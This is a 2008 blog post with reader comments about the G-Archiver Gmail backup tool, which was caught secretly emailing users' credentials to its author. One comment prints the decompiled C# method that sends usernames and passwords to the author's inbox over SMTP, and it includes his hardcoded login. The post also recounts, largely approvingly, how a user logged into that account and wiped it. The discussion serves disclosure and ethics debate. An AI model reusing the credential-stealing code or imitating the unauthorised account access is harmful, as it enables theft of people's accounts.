programming and human factors
by Jeff Atwood
From the ACM Code of Ethics:
As an ACM member I will
- Contribute to society and human well-being.
- Avoid harm to others.
- Be honest and trustworthy.
- Be fair and take action not to discriminate.
- Honor property rights including copyrights and patent.
- Give proper credit for intellectual property.
- Respect the privacy of others.
- Honor confidentiality.
It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:
I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box! Having just entered my own information I became concerned.
I opened up a browser and logged in to gmail using his account information. It still worked.
Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.
I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.
I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.
MateMedia is a legitimate company and we are absolutely horrified that this has occurred.
We have removed from our websites all links to the software, and will be requesting any download sites that are hosting the software to remove it immediately.
We are in the process of notifying our customers, and we're investigating this matter with our software development team.
Russ on March 8, 2008 9:16 AMI think the issue here is not ethics, we're talking about unlawful behavior, that guy should be prosecuted.
Regards
Jorge Diaz Tambley on March 8, 2008 9:22 AMDidn't Dustin email all the affected users to warn them to change their passwords?
I was thinking that too.
I hate to add to this long list of comments, but I can't help but notice this:
client.EnableSsl = true;
Irony anyone?
What everyone seems to be missing is the fact that through g-mail you can easily set up a filter to forward all in-coming e-mail to another e-mail address without marking it read. So deleting all of the e-mails probably did absolutely nothing. Plus the fact that this guy could be using his iown program/i to archive all of the e-mails he got with the usernames/passwords.
I think that Dustin Brook's heart was in the right place, but the best thing would have been to immediately change the password, and then go into "contacts" and click "select all" and send a warning e-mail to everyone (gmail automatically adds a contact for anyone that e-mails you). Then to notify Google, leaving the e-mails intact as evidence (since you already changed the password, the guy can no longer get into the account, so the e-mails don't need to be deleted).
Despite that, I think that Dustin did a great thing, and I'm glad he also made an effort to get the word out by sending the story to a well known blog like this one.
I made the mistake of telling Facebook's Friend Finder my password, and then realized how dumb it was and changed it to a pass-phrase that I will never share with anyone/anything except the gmail sign in page. I think Jeff has done a great job in championing proper password practices.
As a programmer, I'm ashamed to say that I never really thought about how I was storing my user's passwords until after reading a few posts on this blog. However my boss unfortunately will not allow me to encrypt user's passwords because he says that "we don't store any private data, and we want password recovery to be instant and easy". So we use pathetic secret questions/answers to "verify" them and then reveal to them their password in plain text right there on the webpage if they forgot it. It makes me sick. Unfortunately, I don't have a choice...
I am interested to hear any further details on what happens with this story if Google ever tells Dustin if anything ever came of this...
Chris on March 8, 2008 9:32 AM"The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others."
If we consider those around us "equal in worth", where worth is the capacity to create, to dream, to love, etc, we also have to consider them equal to us in their capacity to invent ways to kill us. To the extent that a human is capable of good, he or she is also be capable of evil.
"However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies."
I completely agree with your principles, but any serious set of ethics has to render unto Caesar what is Caesar's.
ben on March 8, 2008 9:45 AMThis is appalling. I'm really glad you wrote the article.
Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.
I thought the topic here was Ethics [albeit Programming Ethics]?
To my way of thinking all he had the right to do was contact google and report the incident.
Were his actions /really/ any more "ethical" than John Terry's?
Dave on March 8, 2008 10:05 AM@A Programmer
The perpetual nature of US copyrights (70 years after the death of the creator plus however many years Disney wants added so they can keep Mickey Mouse out of the public domain) is the major problem with copyright law. I have no problem with using copyright to protect software; it worked for many years, it prevents wholesale theft while allowing independent invention.
Patent law is a whole different animal. Traditionally patents were awarded only for physical devices - software was only considered if it was part of a physical device. Now any jackass can patent math and dance (software and "business processes" such as Washington Mutual's branch office layout.)
I don't see any problem with ACM's approach regardless of my view that software patents are an egregious misuse of the patent system. Like it or not, it's the law and the right way to handle the issue is to tell the profession to obey the law as part of a code of ethics while working to get bad law changed. ACM does the former; does it do the latter? Given its membership and (more importantly) sponsorship, can it?
Contrast ACM's code of ethics with those of LOPSA (The League of Professional System Administrators - see http://lopsa.org/CodeOfEthics):
"I will educate myself and others on relevant laws, regulations and policies regarding the performance of my duties."
and
"As an informed professional, I will encourage the writing and adoption of relevant policies and laws consistent with [the LOPSA Code of Ethics]."
That said, I've decompiled Java to examine vendor source code to debug problems and nudge vendors toward fixing our issues. I've done code reviews on proprietary code to which I have had access to the source and have reported bugs back to the vendor (specifically for software that estimated the effects of radioactive material releases to the public.) In that case, the vendor issued an advisory and sent us a fix within a few days.
Experience has convinced me that whether software is proprietary or open, the end user must have access to the source code otherwise they have no assurance that the code even works or that the vendor's agenda aligns with their own. Code is the instantiation of the author's agenda - if the author is a grifter or thief, it will show in the code.
Bob on March 8, 2008 10:17 AMBTW: To Delete the GMail Account:
Open GMail Account
Click on Settings [upper right]
Click on Google Account Settings [near bottom]
Click on My Services - Edit
Click on Close account and delete all services and info associated with it
[didn't go any further than this]
Even though Dusting Brooks got the Email account deleted thus destroying vital information I think Jeff still Has the Screenshots ,Isn't that enough to prosecute John Terry ?
gogole on March 8, 2008 10:47 AMwell done!somebody knows who is this John Terry and his location?
Juanjo on March 8, 2008 10:56 AMRegistrant:
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: GARCHIVER.COM
Created on: 03-Apr-07
Expires on: 03-Apr-08
Well done, Dustin!
Steven Fisher on March 8, 2008 11:11 AMRegistrant:
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MATEMEDIASOFT.COM
Created on: 08-Aug-03
Expires on: 08-Aug-08
Last Updated on: 07-Aug-07
Administrative Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521
Technical Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521
Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM
Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited
This is precisely why I won't use "free" software that isn't open source or released by a "reputable" company.
haunches on March 8, 2008 11:13 AMOne name I did notice in the gmail screen cap in the contacts list is Pawel Lesnikowski. He's a writer of .NET components:
Maybe he might know this John Terry. This abuse of personal trust and privacy is appalling. I hope this site and application is flagged as a trojan and taken down by everyone in the shareware community.
Geoff Dalgas on March 8, 2008 11:25 AMDave -- if you think Dustin's ethics are the same as this other guy's, then you obviously don't really understand ethics all that well. There's nothing unethical about viewing source code of others (ripping it off is something else entirely), there's nothing unethical about stopping someone from harvesting identity information of others. Whatever ethical infractions which might exist in using someone else's login information is well covered by the doctrine of double-effect.
Shmork on March 8, 2008 11:59 AMI used a software, which has a demo-mode for an online service. Probably in demo-mode, developer of software was using his credentials, probably hardcoded in software.
I realized, after using the software in demo-mode, if I opened the website (gmail, yea it was google's api that software uses) in browser, I logged into his gmail automatically, I thought it was some issues with Google. But later realized, it's because I used that software in demo mode, new cookies were in places.
Anyway, I informed the developer, never heard back. I don't use that software anymore for two reasons:-
1) Don't want my Gmail cookies replaced by others
2) I don't feel good, if I unintentionally log into his account
-abdul
Makes sense.
sqoosh on March 8, 2008 12:29 PMOn a related note... let's say I need to send emails through a gmail account from my C# program. This basically means there will be strings inside my source that contain the gmail username and password.
This is obviously bad, in the presence of Reflector. In the unmanaged world we could encrypt the strings using some encryption algorithm, and since the details of the encryption algorithm would be compiled to assembly nobody could tell what's going on. But in the managed world, the details of such an encrypting process are there for everyone to decompile, so it doesn't sound like that's going to work.
This _must_ be a solved problem, but I don't really know the keywords to use to find the solution...
Domenic on March 8, 2008 12:52 PMI must say, I love the comments about how if this were open source, this could never have happened.
Consider this:
1) I make some application
2) I package up the source code
3) I inject malicious code and compile said source code
4) I put both the 'clean' source and malicious binary files on (say) Sourceforge and mark it as GPL.
How many people, do you think, are going to actually check that the source and binaries match, or compile it themselves from source?
Open Source Software is not the answer to preventing this kind of abuse in trust.
As for the comments that this was possibly just debugging information let loose - take another look at the source code. It's pretty obvious that this is NOT just debugging info.
It's also unfortunate that Dustin probably broke several laws doing the right thing to protect these folks who had been exploited.
Will Hughes on March 9, 2008 1:25 AM@ Justin Megawarne
Being entitled to viewing the source code doesn't help at all. There's no way to actually verify that the site in question actually uses the source code as-is. That's a huge misconception that people have about open source software, especially open source-based online apps.
People assume, "well, look, the source code is available, everything must be on the up up." For all they know, the site is 100% malicious but using the same interface. Really, the only way to be safe with open source is to diligently read the code and then compile it yourself, or to trust the community distributing it. Of course, that's not an option when you're on someone else's site.
OAuth, OpenID, etc. are vitally important options. Of course, they're still not ultimately friendly enough. And in the case of OpenID, there's still a huge level of trust that has to be placed on the provider (since Joe Shmoe will not have his own web site).
It's already bad enough that email is the focal point of almost all of a person's services/usernames/passwords... and losing access to your email effectively terminates your online self. Sure, Google can be trusted with email, to a degree. That's not necessarily the issue. The issue is just how *EASY* it is for someone to get your email user/pass. Use any machine that has a keylogger (hardware or software) installed by a user or virus, and boom... everything you've ever done and use is in someone else's hands.
I suppose the only way to combat that is biometrics + some form of verification that relies on a floating, constantly changing password some how. :S
Zm on March 9, 2008 1:32 AMThe worst thing is that now our dear Jeff (probably) won’t stop cheating but will become smarter covering his @ss while doing it.
rockordie on March 9, 2008 1:35 AM@ Justin Megawarne
Oh, sorry, I re-read what you said. You meant a piece of software like G-Archiver. Of course, what you suggest wouldn't be fair or legally possible.
How 'bout this for an idea along those lines: a third-party that verifies software as "safe". It would be the BBB/Verisign of sorts for software. I suppose, the company or independent developer would then pay the verification service based on the complexity/length of the code. The service would verify various points, ensuring the software won't screw a user, then give a quality seal w/ lookup online, as well as the hash or whatever to verify it's the same software.
That would allow developers to keep their intellectual property and get their software used more. And that'd be great for users as well. Oh, and great for a business if the costs can be worked out.
I don't know, maybe things like that exist (probably).
Zm on March 9, 2008 1:51 AMWe all applaud DB for doing what, in the end, is right.
However his actions weren't (entirely) ethical. After DB logged onto gmail and verified that the code was stealing username/passwords he should have stopped. It can be argued that up to that point he couldn't know his assumptions were correct. There's often dead code, and the code discovered code doing the emailing could have been 'test' code for all DB knew.
Additionally, using Lutz's Reflector isn't illegal. JT made no attempt at obfuscating his code, encrypting, signing, etc. No more illegal than using a screwdriver to open a tv set. Why do coders/politicians/police think that some legally magical properties are given to some binary output after being processed by a compiler.
However much I'm in favor for DB's actions, once he deleted the emails he's trashing evidence and exposing himself to prosecution/liability (in some countries at least). We cringe when an honest guy gets trashed because he was trying to do good.
If DB just changed the password that would have been OK, because all that does is prevent the malicious software from operating, and doesn't cause any long-lasting damage.
That said, I really doubt that DB thought out his actions once logging onto gmail. He reacted, probably like many of us would. I imagine being in that situation, freaking out, and doing the exact same thing as a knee-jerk reaction.
So save your harsh comments for JT instead, because he deserves them, as well as deserving prosecution.
I'm lost trying to figure out the point of this article. Other than mentioning something vaguely smart and hand-wavily academic (like the ACM code of conduct), I don't spend my time reading Coding Horror to hear about simplistic disassembly of crude pieces of spyware; there are much better resources for that.
Deleting the email data in question was a really dumb knee-jerk reaction, although I trust that Google are well equipped to deal with this kind of stupidity.
For those just tuning in to this thing called the Internet, creating quasi-useful pieces of software that act as a conduit for malware is nothing new. Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.
Given that GMail provide POP3 and IMAP access, I cannot understand why even a rookie technophile would go off in search of a specialist tool for archiving mail. For what it's worth, I use the excellent little mpop http://mpop.sf.net/ utility for backing up my GMail, although offlineimap http://software.complete.org/offlineimap works too.
David Wilson on March 9, 2008 3:02 AMAFAIK, the information in the gmail account is not actually deleted, in the sense that Google could still recover it if they wanted to, although that would probably require a court order. It might be worth seeing if law enforcement wants to take an interest in this guy - it's not too late.
Zen419 on March 9, 2008 4:05 AMThink FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.
since 1908?
geoff on March 9, 2008 4:54 AM@David Wilson,
How on earth can you compare FunWebProducts (which bundled basic, bur irritating, adware - stupid pop up windows and toolbars) with a program coded to steal usernames and passwords?
If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.
Matt on March 8, 2008 08:45 AM
Wow, that has to be the stupidest comment ever.
FaRsIdE on March 9, 2008 5:56 AMEvery snowflake of an avalanche proclaims its innocence... .
grace on March 9, 2008 6:28 AMThere is no John Terry,from the password you can guess its some Asian dude wanna be hacker,and the site you mentioned to download is a bad site to download things from.Try download.com next time.
NOTE: Its not about programming ethics or programmers. There are good and bad people.And well it everyone had ethics (ba humbug!) then the world would have been a better place and no one would create viruses,hack tool,root kits(sony!) etc....
Lame post i tell ya.
PS: Hope you dont censor this !(free right to opnion)
GlaB on March 9, 2008 6:29 AM@Geri:
You can't port someone's opinion over from one thing to another. If I'm running software on my computer, I have a right to know what it does. The police only have a right to spy on people when they have reasonable grounds to believe it is necessary -- there's almost nobody who thinks that police should NEVER be allowed to read private mail; the only real argument is WHEN "there is a public safety imperative that overrides any privacy rebuttal."
Your argument it facile.
Andrew on March 9, 2008 6:34 AM@Justin Megawarne
"This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash."
This is one reason that the police should be entitled to examine a citizen's emails and personal correspondance, without fear of legal backlash.
"There is an ethical imperative here that overrides any economic rebuttal."
There is a public safety imperative that overrides any privacy rebuttal.
I thought your arguments sounded familiar.
Geri on March 9, 2008 6:47 AMHaha, this is probably one of the dumber identity thieves I've heard of. Why embed his own username and password and risk it being extracted when THE USER JUST ENTERED THEIR OWN SET? He could've just use theirs and sent an e-mail using those credentials! The only problem then is that an e-mail might appear in their sent folder (until he immediately deletes it).
Of course that wouldn't have prevented its detection. Assuming this is a .NET program (that's the only Reflector I know) there is no way to prevent deompiling unless you use one of those expensive scrambling/obfuscating programs (there might be a free/open source one as well, wouldn't surprise me, but I don't know of any ATM).
Dan on March 9, 2008 7:51 AM(ironic mode:on)
I need my ex-girlfriend gmail password, it's very important! please send me it at my hotmail account.
Thanks
(ironic mode:off)
;-)
It might have been more wise to datamine the usernames from his inbox, and do a mass-mailing to all of them telling them to change their password. You definitely did a good thing, though. Hopefully Google can take care of informing the users to change their passwords.
reid on March 9, 2008 8:27 AMplug type='shameless'
As was already mentioned, you can easily backup your gmail with, say, thunderbird, in 5 easy steps:
http://blogoscoped.com/forum/22775-full.html#id24184
MSpreij on March 9, 2008 8:34 AMWhy do you need junk software like this when you can simply use **any** email client, via POP and backup your mail locally? It's not like yahoo or hotmail where you have to pay for POP access. Duh?!?
Matt on March 9, 2008 9:16 AMThis would never happen in the Linux world because the approvers of binary packages we download from our distribution vendor must first have access to the source code, and they review the source for malicious items like this. And on Ubuntu, this is doubly so because packages are reviewed by the Debian team, then by the Ubuntu team.
So, Windows users, you might want to start getting the source and compiling stuff yourself rather than using binary executables.
Volo Mike on March 9, 2008 9:58 AMThis is truly a sad story =( Us geeks are often privy to a LOT of very confidential, sensitive information, be it logins, financial data or even business plans. There is implicit trust as soon as people fire up your application, that trust should never be abused. Its unethical, immoral and excuse the language, but just makes you an a-hole!
Well done though Dustin for figuring it out and doing the right thing! Did anyone ever find out if he emailed the people that had been stung to get them to change their account information?
Hell of a good reason to fire up reflector on any shareware that you enter account information into..
Good job the idiot didnt have the brains to store his password in some soft of encrypted format! =D
Rob on March 9, 2008 10:02 AMBefore we point fingers of Linux vs. Windows and claim how you should have done this or that, we need to take a bit of action:
1). Everyone here should email abuse@godaddy.com and tell them that a site they've registered is doing something that is probably illegal. The site is registered by GoDaddy under the name of MateMedia:
Administrative Contact:
Inc., MateMedia hostmaster@matemediainc.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
(877) 309-7521
Next, if anyone of you know someone who has fallen for this, have them write a complaint to the Attorney General of Florida: http://myfloridalegal.com/contact. There is a complaint form: FILL THAT OUT! Don't just email the Attorney General, fill out the form at http://www.myfloridalegal.com/ConsumerComplaint.pdf.
They will track down this guy (easy enough to do with a few court orders) and go after him. He has committed fraud (especially since he's taken money for this program), electronic theft, and possible identity theft.
BTW, you might find this article of interest: http://www.quickregister.net/articles/customerservice/4_Customer_Service_Mistakes_Companies_Should_Avoid.html. Apparently, his name here is "Russ Mate".
Here's a few more URLS http://www.russmate.com/
http://mediamateinc,com
Might I suggest that you change the title of this post to something like "Don't use G-Archiver" so that it shows up as an immediate clear warning in search results. It already shows up as #3 in search results for g-archiver, but g-archiver itself is #1.
Richard Schwartz on March 9, 2008 10:13 AMI am in no way defending what happened here, but in all honestly blaming shareware is not really fair. If anyone had gone to the "companies" site and taken a loot at it, they probably never would have installed it being how shady it looks. That's just common sense, I am sorry.
There are legitimate companies out there that get listed on shareware sites, be it from themselves or from affiliates.
Matthew R. Miller on March 9, 2008 10:40 AMShocking indeed, is there a way to announce and create awareness so in future other innocent users don't fall into this trap ?
Ajo Paul on March 9, 2008 10:43 AMA few comments on Dustin Brooks' ethics:
Dustin Brooks did no wrong in using Reflector. There is nothing in the G-Archiver license that prohibits using Reflector in examining the source code.
Dustin Brooks took immediate action when he suspected that his Gmail address was stolen. Normally, you don't log onto someone else's account, but in this case, Dustin Brooks had immediate knowledge that his Gmail account information was stolen, and had to take immediate action to prevent theft.
Dustin Brooks saved thousands of people from getting their email addresses stolen by deleting them from this account. He has saved thousands more from getting their email stolen by deleting the account and locking it.
Saying Dustin Brooks acted unethically is like saying someone who runs into a burning building and saved a baby acted unethically because they didn't ring the doorbell and asked permission to enter and thus trespassed onto someone else's property.
The account in question was obviously used to steal email addresses from other people. Dustin Brooks quick thinking saved them from having their accounts stolen.
There are two other things Dustin Brooks should do: If possible, contact these people and let them know their Gmail accounts might have been compromised. He should also contact Google and let them know about this account and contact the Attorney General's office to file a complaint.
As for Russ Mate who is shocked! shocked! that this happened on one of his accounts, why is the garchiver site still up and running? Certainly, you as the technical contact and registrar have the power to take this site off the air. If someone contacts you about g-archiver, are you willing to reveal the name of the client, so others can get in contact with them, or to be able to file charges against this client?
David W. on March 9, 2008 11:01 AMWhy did you link to the software as well? Gives it promotion.
Matthew R. Miller on March 9, 2008 11:22 AMCount me in the "mostly did the right thing" camp:
- Reflector: does anyone who doesn't wear a suit really think "reading the directions" is a crime? (This doesn't pardon plagerism or other unsavory *use* of what you see, but the act of looking?). No harm was done here.
- Google: I probably wouldn't have deleted the emails (given a few minutes to think about it). Best practice probably is:
1. Check for email forward.
2. Add email forward to auto-reply warning that their information is being compromised. Cc abuse@google.com (or some other suitable email)
3. If there's an easy way to auto-reply to existing victims, do the same for them.
4. Change the passwords, security keys, and whatever else I can find.
5. Send an email to abuse@google.com (or whatever email I find) *from that account* detailing the situation and actions taken.
6. Log out, and find a better way to backup email. :)
Everyone who can be informed is informed, perp is locked out - but if it turns out to be some massive misunderstanding *snicker* nothing irreversible has been done, and I am relatively anonymous (if someone decides to go all Gestapo on "the big bad hacker") Not bothering to contact police - Google'll do it if there's a chance of prosecution.
Suggestions?
Allen on March 10, 2008 2:23 AMBTW, I have a small and OPENSOURCE Python script to backup your whole GMail account (inbox, archives, sent) in the standard mbox format.
You can review the sourcecode yourself: There are only 23 lines of code.
http://sebsauvage.net/python/snyppets/index.html#archive_gmail
sebsauvage on March 10, 2008 2:29 AMIt looks like it really could have been a mistake:
http://www.garchiver.com/what-happened.htm
Since the method is called "TestConnection" this is even somewhat plausible. Seriously, I bet there are programmers here who have leaked their own credentials this way.
Its still pretty stupid, though... ugh.
Jess Sightler on March 10, 2008 2:56 AMno
jeep on March 10, 2008 3:04 AM"What happened was that a member of our development team had inserted coding used for testing G-Archiver in the debug version and forgot to delete it in the final release version."
Riiiiight...
Somehow I doubt that it takes a "development team" to write this piece of blatant malware.
DBrant on March 10, 2008 3:06 AMI can only assume 'Dave' above ("it's unethical to act to prevent massive password theft") is either a blithering idiot, or a troll.
commenter on March 10, 2008 3:16 AMHA! Yeah, it was just a mistake. That's why it's contained in a seperate .dll named simply "SM" with only one class "Mail" which breaks the naming convention of the rest of the source. This class has a trivial constructor and one method, that Brian listed already. Anyway, if you'll notice in the method, it swallows the exception as well.
Now I gotta ask, what kind of test method swallows the exception? No my friends, this guy was trying to slide one under the rug so to speak. On the bright side I would assume he's being terminated and or sued by the company that put up that chipper message about how it was all a mistake and despite their developer receiving thousands of email addresses and passwords they never notified a customer, rolled out an update, or updated the program itself.
My advice, if you used the program, change your password. Look for signs of identity theft, too. If you see them, you know where to point a finger, not at the developer either, at the company that released it. Secondly, never use any product from anyone even involved in this project again.
marr75 on March 10, 2008 3:17 AMAccident my ass.
--------------------------------------------------------
What happened with G-Archiver?
It has come to our attention that I got caught stealing customer's Gmail account usernames and passwords.
It is urgent that you remove the current version of G-Archiver from your computer, and change your Gmail account password right away so that I can have plausible deniability.
What happened was that I inserted coding used for stealing G-Mail passwords in the debug version and decided it was a great idea so I didn't delete it in the final release version.
I sincerely apologize that I got caught and assure you that you weren't intended to find out about this.
We'll be releasing a new version that uses encryption, the .NET Obfuscator, and updates the account details found in version 1.0 (since I got locked out of my account). The new version will be available very soon. Download and tell your friends!
Nick on March 10, 2008 3:43 AMI would like to pose a hypothetical situation for people to consider.
If some sort of potentially IMMEDIATE risk were occurring, like, say... I left my keys in a bus station, and a friend of mine saw someone that neither one of us knew, entering my house... there are some things I would like him to do.
1) Phone me - Dustin SHOULD have emailed everyone on the list, I agree... however, all of this information seems to be included in R/E line.. or the body...? In any event, it does not look like it would be as easy as clicking "forward", or anything else like that, it looks like 1700+ emails worth of cutting and pasting.
if the hypothetical friend of mine (i have no actual friends) who saw the intruder didn't have a cel phone, was out of time or dropped it and broke it, that's ok... I WOULD APPRECIATE SOMEONE ACTING IN MY BEST INTEREST. I would hope my friend would carry on to ...
2) Approach my house and ask what is going on - Dustin looked through the emails, and came to a conclusion which, I think we can all agree, was a no-brainer. The few reasons for having a list of this information are few, and none of them are in the best interest of the person doing it.
The chances that this list were an innocent list of names, for say demographics, are stupidly slim.
If my friend saw this person, say, stealing my stuff through the window... I would hope that they would take some action!
Incidentally, if Dustin approached the house and annouced himself to ask what was going on, he may put himself in danger - or the intruder may run off with my keys. So, maybe the metaphor isn't PERFECT, but it's 5:45 am.
3) Inform the Authorities - Dustin informed Google. Nuff said. My friend should call the police, number one. However, that (in my mind) does NOT preclude ...
4) Act to save my stuff - Go in and knock the guy out! I certainly won't charge my friend with trespassing, and I don't think the cops in MY home town would charge him with assault. This would probably end up being one of those "He must've fallen while trying to escape and given himself 4 black eyes" cases.
Maybe the metaphor is wrong in several ways, since it doesn't really convey the immediacy of the threat... what if my friend saw this intruder, lighting a match and setting it to my sofa? What if the problem were so immediate, that every passing second could spell disaster?
To anyone who knows me;
If I see someone about to burn your house down, and the battery on my cel phone is dead, I will
a) Enter your home
b) grab a fire extinguisher
c) douse him with it
d) knock him upside the head with it until he stops moving
e) use your phone to call the cops
I would do so in the full knowledge that you could, for example, charge me with breaking and entering, or he could charge me with assault. Hopefully, he didn't die from the battery.
Oh, and by the way, Dustin... THANK YOU! Don't pay any attention to people who BS about legal crap. You did, IMHO, the right thing. Yeah, you didn't email the people, but in the heat of the moment... sometimes we forget to plug in our cel phones. Everyone on that list is grateful to you, I am sure. I sincerely hope you interrupted a bot and crashed a server when you did it.
Philip Snelgrove on March 10, 2008 3:48 AM"and none of them are in the best interest of the person doing it."
=
"and none of them are in the best interest of the people who's information is so stored".
I think the point here is not about ethincs as you can never rely on someone else to have ethics... It's more about protecting your information.
Passing your username and password to anyone for anything should always be done extremely carefully.
On a similar theme, one of my pet hates is websites that require you to register on them. You create a username and password, they then immediately email you your credentials (so you don't forget them?).
I then kick myself for having used one of my current "strong" passwords for them to then send in an email in plain text! Where's the ethics in that?
Robin on March 10, 2008 4:09 AMfrom bothersoft site:
BrotherSoft.com is not only a website for software downloading, we also evaluate the software based on our established evaluation criteria, which is submitted by developer. And we will also give the software developer an honest opinion. Our original intention is that our evaluation could help the software developer provide a better one for their customers.
(auhuahuahuahuhauahuhauhauhau)
even though we now know what is going on...someone broke the DMCA and needs to pay
this is bad - reverse engineering of code is protected under the DMCA
anonymous coward on March 10, 2008 4:20 AMHaha! Slipped into a debug version? I don't recall exact dates but it was more than a years worth of data possibly two.
Why on earth would you need to send a username and password to a gmail account to test a connection? This program has no reason to even store the usernames and passwords, at all. To test a connection, send the word "Test," I think it would have worked the same way.
I'll still defend my actions, had he managed to have google reset his password that data would have still been at risk and since I never heard back from Google (only automated responses that they got my message) I wasn't sure any action would be taken on their behalf.
Why on earth would this guy hard-code his password in the program? That doesn't make sense to me at all, you don't need it to send data to the acoount. Is this guy -really- stupid or are you, just maybe, not telling us the entire truth about how you got into his account :) .
Not to be an ass or something, congratulations and thanks for your research.... it's just curiosity.
Wot on March 10, 2008 4:47 AMActually John Terry is a quite famous guy.
http://www.chelseafc.com/page/ThePlayers/0,,10268~5593,00.html
Name is most probably just bogus - especially if this was intent.
Petter Jensen on March 10, 2008 4:59 AMI never found a decent email archive program so I wrote one in Python about a year ago, it downloads your emails to text files (saves the extensions too). I figure there might be some people looking for a decent, simple email archiver so I threw it online. You can find it here...
Jeff, I hope it is okay to post a link like this. I polished the script over the weekend because after reading this post on Friday I figured there might be some people looking for a new email backup utility. Also, since it is written in Python there aren't any secret surprises since you can see everything Popbak does.
Jaymon on March 10, 2008 5:04 AMNow someone has posted the guy's address, suggesting people send pizza and plumbers.
This has gone a litte too far methinks.
I'm guessing that Mate/MateMedia is just the proxy used for domain registration with GoDaddy rather than Douchebagus Maximus himself. I have a domain registered through GoDaddy and I use one called DomainsByProxy to keep my personal contact info out of DNS. You'd probably just be sending a pizza to the guy who started the proxy organization. Not to imply that he mightn't appreciate some za...
Brian on March 10, 2008 6:12 AMIt looks like from his password "bilal482" which is an asian name, his name might not be John Terry at all.
Amit on March 10, 2008 6:16 AMUmm...let me get this straight -
You want to back up your email, which contains a bunch of sensitive data. Rather than back it up securely on your own machine or device (which can be done in, probably, thousands of different ways), you decide to download some random application that was written by someone you don't know, and then blissfully punch your username and password into it.
Can we please stop talking about heroes and villains and start talking about stupidity?
Terry on March 10, 2008 6:23 AM@David W: The garchiver site is still "up", but the "Free Download" and "Buy now" links have been removed. I guess that's better than nothing, under the circumstances.
- Roddy
Roddy on March 10, 2008 6:26 AMThere is a difference between "ethics" and "acting in defense of another."
Sometimes, one has to betray the first in order to do the second. Regardless of all the arguments to the contrary, something WAS seriously wrong with that code. Even someone with only basic HTML programming can see that.
Dustin may not have taken an "ethical" path, but he did act in the defense of both himself and the other people who were at risk. There are too many arguments going back and forth about who was right and who was wrong... several of them not even applying to this entry.
"War" ethics are a hotly debated topic and have no place here. As my mother would ask: "What has that got to do with the price of tea in China?" Reply: About the same as it has to do with this post.
Point Simple: Dustin acted to protect himself and other users. That is not a vigilante act. He performed the internet version of tripping up a purse snatcher or pickpocket.
He is, in essence, a witness to wrong-doing. He is the one who halted it and contacted GMail about it. The fact that he has not been further contacted by GMail or law-enforcement authorities shows that they're really making an effort and busting their backsides to bring this guy to justice, doesn't it? /sarcasm
Cranky Goldfish on March 10, 2008 6:38 AMI don't know about in the USA but in the UK this would actually be illegal as it would fall under our data protection act. Basically no one can store your information without letting you know first then they must remove it after it has become unreasonable to keep (likely out of date, not needed etc..). It is also their responsibility to hold it securely.
pete on March 10, 2008 6:41 AMpublic class Mail
{
// Methods
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
}
Only 1 word ...... incredible !
Bye, Cristian.
Manualinux, the Linux Manual http://www.manualinux.com
Cristian on March 10, 2008 7:17 AMGranted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for google checkout.
I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well.
The only emails in this account were usernames/passwords. This wasn't a personal account used for other things.
The only thing I worry about now is his account getting restored from Gmail. Does anyone have a good way to contact them? I sent something through their "suggestions form," because it was the only one I could find.
